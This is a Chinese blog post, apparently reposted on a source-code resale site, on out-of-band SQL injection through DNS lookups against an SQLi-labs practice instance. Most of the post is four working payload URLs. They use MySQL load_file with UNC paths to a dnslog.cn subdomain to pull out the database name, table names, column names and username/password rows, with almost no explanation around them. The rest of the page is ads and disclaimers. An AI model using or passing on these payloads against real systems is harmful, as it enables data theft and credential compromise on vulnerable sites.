开通VIP
登录
注册新用户

SQL注入之dns回显注入

2020年8月6日 下午1:00 作者:amin 分类:安全运维 6


DNSlog外带数据注入

用到的网站

http://dnsbin.zhack.ca/

http://dnslog.cn/

http://ceye.io/

pyload:

查库

http://192.168.232.128/sqllabs/Less-8/?id=1' and load_file(concat("\\\\",database(),".kkc53r.dnslog.cn\\xxx.txt")) --+

查表

http://192.168.232.128/sqllabs/Less-8/?id=1' and load_file(concat("\\\\",(select group_concat(table_name SEPARATOR'-') from information_schema.tables where table_schema='security'),".kkc53r.dnslog.cn\\xxx.txt")) --+

查列

http://192.168.232.128/sqllabs/Less-8/?id=1' and load_file(concat("\\\\",(select group_concat(column_name SEPARATOR'-') from information_schema.columns where table_schema='security' and table_name='users'),".kkc53r.dnslog.cn\\xxx.txt")) --+

查数据(ps:子域名长度不能超过63个字符)

http://192.168.232.128/sqllabs/Less-8/?id=1' and load_file(concat("\\\\",(select concat(username,password) from users limit 0,1),".kkc53r.dnslog.cn\\xxx.txt")) --+

原创:https://www.panoramacn.com
源码网提供WordPress源码,帝国CMS源码discuz源码,微信小程序,小说源码,杰奇源码,thinkphp源码,ecshop模板源码,微擎模板源码,dede源码,织梦源码等。

专业搭建小说网站,小说程序,杰奇系列,微信小说系列,app系列小说

SQL注入之dns回显注入

免责声明,若由于商用引起版权纠纷,一切责任均由使用者承担。

您必须遵守我们的协议,如果您下载了该资源行为将被视为对《免责声明》全部内容的认可-> 联系客服 投诉资源
www.panoramacn.com资源全部来自互联网收集,仅供用于学习和交流,请勿用于商业用途。如有侵权、不妥之处,请联系站长并出示版权证明以便删除。 敬请谅解! 侵权删帖/违法举报/投稿等事物联系邮箱:2640602276@qq.com
未经允许不得转载:书荒源码源码网每日更新网站源码模板! » SQL注入之dns回显注入
关注我们小说电影免费看
关注我们,获取更多的全网素材资源,有趣有料!
120000+人已关注
分享到:
赞(0) 打赏

相关推荐

评论抢沙发

取消

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

安装、售后、二开、app生成、请联系在线客服,qq不在可点击图片直达淘宝旺旺客服。9点-24点,天天在线。任何无法使用源码,可退货。

天籁之声

最新文章

最新评论

您的打赏就是我分享的动力!

支付宝扫一扫打赏

微信扫一扫打赏